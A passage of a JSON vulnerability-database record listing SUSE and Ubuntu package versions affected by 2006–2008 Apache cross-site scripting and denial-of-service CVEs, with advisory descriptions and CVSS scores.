"apache2-doc", "packageFilename": "apache2-doc-2.2.4-70.4.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2-example-pages", "packageFilename": "apache2-example-pages-2.2.3-16.17.3.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.3", "packageVersion": "2.2.4-70.4", "packageName": "apache2-utils", "packageFilename": "apache2-utils-2.2.4-70.4.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2", "packageFilename": "apache2-2.2.3-16.17.3.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2", "packageFilename": "apache2-2.2.3-16.17.3.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.3", "packageVersion": "2.2.4-70.4", "packageName": "apache2-worker", "packageFilename": "apache2-worker-2.2.4-70.4.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.3", "packageVersion": "2.2.4-70.4", "packageName": "apache2-example-pages", "packageFilename": "apache2-example-pages-2.2.4-70.4.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2-doc", "packageFilename": "apache2-doc-2.2.3-16.17.3.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2-worker", "packageFilename": "apache2-worker-2.2.3-16.17.3.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2-worker", "packageFilename": "apache2-worker-2.2.3-16.17.3.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2-example-pages", "packageFilename": "apache2-example-pages-2.2.3-16.17.3.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.2", "packageVersion": "2.2.3-24", "packageName": "apache2", "packageFilename": "apache2-2.2.3-24.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.2", "packageVersion": "2.2.3-24", "packageName": "apache2-devel", "packageFilename": "apache2-devel-2.2.3-24.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2-doc", "packageFilename": "apache2-doc-2.2.3-16.17.3.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.1", "packageVersion": "2.2.3-16.17.3", "packageName": "apache2-prefork", "packageFilename": "apache2-prefork-2.2.3-16.17.3.x86_64.rpm", "arch": "x86_64", "operator": "lt"}], "description": "Various minor bugs have been fixed in the Apache 1 and Apache 2 web servers and released as a roll-up update.\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "reporter": "Suse", "published": "2008-04-04T16:29:16", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "type": "suse", "title": "cross site scripting in apache2,apache", "bulletinFamily": "unix", "cvelist": ["CVE-2006-3918", "CVE-2007-6203", "CVE-2008-0005", "CVE-2007-6421", "CVE-2007-6388", "CVE-2007-5000", "CVE-2007-6422"], "modified": "2008-04-04T16:29:16", "id": "SUSE-SA:2008:021", "href": "http://lists.opensuse.org/opensuse-security-announce/2008-04/msg00004.html", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "ubuntu": [{"lastseen": "2018-08-31T00:09:36", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2007-6422", "https://people.canonical.com/~ubuntu-security/cve/CVE-2008-0005", "https://people.canonical.com/~ubuntu-security/cve/CVE-2007-6388", "https://people.canonical.com/~ubuntu-security/cve/CVE-2007-3847", "https://people.canonical.com/~ubuntu-security/cve/CVE-2006-3918", "https://people.canonical.com/~ubuntu-security/cve/CVE-2007-4465", "https://people.canonical.com/~ubuntu-security/cve/CVE-2007-6421", "https://people.canonical.com/~ubuntu-security/cve/CVE-2007-5000"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "6.10", "packageVersion": "2.0.55-4ubuntu4.2", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "apache2-mpm-prefork", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "6.06", "packageVersion": "2.0.55-4ubuntu2.3", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "apache2-mpm-perchild", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "6.10", "packageVersion": "2.0.55-4ubuntu4.2", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "apache2-mpm-worker", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "7.04", "packageVersion": "2.2.3-3.2ubuntu2.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "apache2-mpm-event", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "6.06", "packageVersion": "2.0.55-4ubuntu2.3", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "apache2-mpm-worker", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "7.04", "packageVersion": "2.2.3-3.2ubuntu2.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "apache2-mpm-worker", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "7.04", "packageVersion": "2.2.3-3.2ubuntu2.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "apache2-mpm-prefork", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "7.10", "packageVersion": "2.2.4-3ubuntu0.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "apache2-mpm-event", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "7.10", "packageVersion": "2.2.4-3ubuntu0.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "apache2-mpm-prefork", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "7.04", "packageVersion": "2.2.3-3.2ubuntu2.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "apache2-mpm-perchild", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "6.06", "packageVersion": "2.0.55-4ubuntu2.3", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "apache2-mpm-prefork", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "7.10", "packageVersion": "2.2.4-3ubuntu0.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "apache2-mpm-perchild", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "7.10", "packageVersion": "2.2.4-3ubuntu0.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "apache2-mpm-worker", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "6.10", "packageVersion": "2.0.55-4ubuntu4.2", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "apache2-mpm-perchild", "operator": "lt"}], "description": "It was discovered that Apache did not sanitize the Expect header from an HTTP request when it is reflected back in an error message, which could result in browsers becoming vulnerable to cross-site scripting attacks when processing the output. With cross-site scripting vulnerabilities, if a user were tricked into viewing server output during a crafted server request, a remote attacker could exploit this to modify the contents, or steal confidential data (such as passwords), within the same domain. This was only vulnerable in Ubuntu 6.06. (CVE-2006-3918)\n\nIt was discovered that when configured as a proxy server and using a threaded MPM, Apache did not properly sanitize its input. A remote attacker could send Apache crafted date headers and cause a denial of service via application crash. By default, mod_proxy is disabled in Ubuntu. (CVE-2007-3847)\n\nIt was discovered that mod_autoindex did not force a character set, which could result in browsers becoming vulnerable to cross-site scripting attacks when processing the output. (CVE-2007-4465)\n\nIt was discovered that mod_imap/mod_imagemap did not force a character set, which could result in browsers becoming vulnerable to cross-site scripting attacks when processing the output. By default, mod_imap/mod_imagemap is disabled in Ubuntu. (CVE-2007-5000)\n\nIt was discovered that mod_status when status pages were available, allowed for cross-site scripting attacks. By default, mod_status is disabled in Ubuntu. (CVE-2007-6388)\n\nIt was discovered that mod_proxy_balancer did not sanitize its input, which could result in browsers becoming vulnerable to cross-site scripting attacks when processing the output. By default, mod_proxy_balancer is disabled in Ubuntu. This was only vulnerable in Ubuntu 7.04 and 7.10. (CVE-2007-6421)\n\nIt was discovered that mod_proxy_balancer could be made to dereference a NULL pointer. A remote attacker could send a crafted request and cause a denial of service via application crash. By default, mod_proxy_balancer is disabled in Ubuntu. This was only vulnerable in Ubuntu 7.04 and 7.10. (CVE-2007-6422)\n\nIt was discovered that mod_proxy_ftp did not force a character set, which could result in browsers becoming vulnerable to cross-site scripting attacks when processing the output. By default, mod_proxy_ftp is disabled in Ubuntu. (CVE-2008-0005)", "edition": 3, "reporter": "Ubuntu", "published": "2008-02-04T00:00:00", "title": "Apache vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "unix", "cvelist": ["CVE-2006-3918", "CVE-2007-4465", "CVE-2008-0005", "CVE-2007-6421", "CVE-2007-3847", "CVE-2007-6388", "CVE-2007-5000", "CVE-2007-6422"], "modified": "2008-02-04T00:00:00", "id": "USN-575-1", "href": "https://usn.ubuntu.com/575-1/", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}]}